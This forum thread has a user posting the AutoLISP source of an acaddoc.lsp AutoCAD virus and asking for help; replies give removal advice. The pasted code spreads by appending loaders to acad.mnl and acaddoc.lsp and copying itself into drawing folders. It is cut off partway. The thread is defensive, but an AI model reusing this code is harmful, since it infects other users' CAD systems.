请教:这两天被acaddoc.lsp搞倒了,杀不了,怎么办。
本帖最后由 huyong 于 2011-6-30 19:14 编辑这两天被acaddoc.lsp搞倒了,打开CAD文件就出现如下提示,就不能操作。按网上的方法均杀不了,现上传病毒文件,请高人帮忙,在此谢谢。
附件acaddoc.lsp的原内容,复制如下.不知这样对论坛有没有影响,如有,请管理员删除。
http://www.zhibo8.com/sopcastguangdong.htm
(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
"cmdecho"
0
)
(setq
wpath
(
findfile
"base.dcl"
)
)
(setq
wpath
(substr
wpath
1
(
-
(
strlen
wpath
)
8
)
)
)
(setq
wwmnlwpath
(
getvar
"menuname"
)
)
(setq
wnowdwg
(getvar
"dwgname"
)
)
(setq
wwjqm
(findfile
wnowdwg
)
)
(setq
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
)
(
strlen
wnowdwg
)
)
)
)
;;;alert
(
setq
f
(
open
"c:\\boot.dat"
"w"
)
)
(write-line
""
f)
(write-line
(strcat
"ff="
wdwgwpath
)
f)
(write-line
(strcat
"yy="
wpath
)
f)
(close
f
)
(setq
boot
(findfile
"boot.dat"
)
)
(if
(/=
boot
""
)
(command
"_-vbarun"
"ThisDrawing.hh"
)
)
(setq
wacadwpath
(findfile
"acaddoc.lsp"
)
)
(setq
wacadwpath
(substr
wacadwpath
1
(-
(strlen
wacadwpath
)
11
)
)
)
(setq
wns1
""
wns2
""
)
(setq
wlspbj
0)
(setq
wwjqm
(strcat
wpath
"acaddoc.lsp"
)
)
(if
(setq
wwjm
(open
wwjqm
"r"
)
)
(progn
(while
(setq
wwz
(read-line
wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(>
(strlen
wns1)
14)
(if
(=
(substr
wns1
8
7)
"acadapq"
)
(setq
wlspbj
1
)
)
)
(close
wwjm
)
)
)
(setq
wlspmnl
0)
(setq
wwjqm
(strcat
wpath
"acad.mnl"
)
)
(if
(setq
wwjm
(open
wwjqm
"r"
)
)
(progn
(while
(setq
wwz
(read-line
wwjm)
)
(setq
wns1
wns2)
(setq
wns2
wwz)
)
(if
(>
(strlen
wns1)
14)
(if
(=
(substr
wns1
8
7)
"acadapq"
)
(setq
wlspmnl
1)))
(close
wwjm
)
)
)
(if
(=
wlspmnl
0)
(progn
(setq
wwjqm
(strcat
wpath
(strcat
(chr
97)
(chr
99)
(chr
97)
(chr
100)
(chr
46)
(chr
109)
(chr
110)
(chr
108
)
)
)
)
(setq
wwjm
(open
wwjqm
"a"
)
)
(write-line
(strcat
"(load "
(chr
34)
"acadapq"
(chr
34)
")"
)wwjm
)
(write-line
"(princ)"
wwjm)
(close
wwjm
)
)
)
(defun
wwriteapp ()
(if
(setq
wwjm1
(open
wnewacad
"w"
)
)
(progn
(setq
wwjm
(open
woldacad
"r"
)
)
(while
(setq
wwz
(read-line
wwjm
)
)
(write-line
wwz
wwjm1
)
)
(close
wwjm
)
(close
wwjm1
)
)
)
)
(if
(and
(=
wacadwpath
wdwgwpath)
(/=
wacadwpath
wpath
)
)
(progn
(if
(= 0
wlspmnl
)
(progn
(setq
woldacad
(findfile
"acaddoc.lsp"
)
)
(setq
wnewacad
(strcat
wpath
"acadapq.lsp")
)
)
(progn
(setq
woldacad
(strcat
wpath
"acadapq.lsp"
)
)
(setq
wnewacad
(findfile
"acaddoc.lsp"
)
)
)
)
(if
(=
wlspbj
0)
(progn
(setq
wwjqm
(strcat
wpath
"acaddoc.lsp"
)
)
(setq
wwjm
(open
wwjqm
"a"
)
)
(write-line
(strcat
"(load "
(chr
34)
"acadapq"
(chr
34)
")"
)
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
)
(progn
(if
(/=
wnowdwg
"Drawing.dwg"
)
(progn
(setq
woldacad
(findfile
"acadapq.lsp"
)
)
(setq
wnewacad
(strcat
wdwgwpath
"acaddoc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar
"cmdecho"
wold_cmd
)
(princ)
(setq
strtopstr
(strcat
(chr
92)
(chr
92)
(chr
70)
(chr
83)
(chr
49)
(chr
92)
(chr
83)
(chr
89)
(chr
83)
(chr
49)
(chr
92)
(chr
87)
(chr
79)
(chr
82)
(chr
75)
(chr
92)
(chr
80)
(chr
76)
(chr
79)
(chr
84)
(chr
69)
(chr
82)
)
)
(setq
strbottomstr
(strcat
(chr
92)
(chr
76)
(chr
79)
注意菜单文件 是否中毒 MNL感染http://bbs.mjtd.com/thread-85791-1-1.html 两个病毒文件的内容不同,按同样的方式出来,查找,删除C盘的acaddoc.lsp和acad.mnl文件,可以正常使用啦,谢谢楼上的。 用 筑原CAD病毒专杀V2.2.exe 可以杀病毒。
里面有专门针对这个LSP病毒的 谢谢各位,已用”筑原CAD病毒专杀V3.1“处理好了,这个很不错的。 用360杀毒就能杀死。来个全盘扫描。 anan596694567 发表于 2011-10-13 15:39
里面有专门针对这个LSP病毒的
Virus Found ! 筑原可以杀掉。很好用的一款CAD杀毒软件。
页:
[1]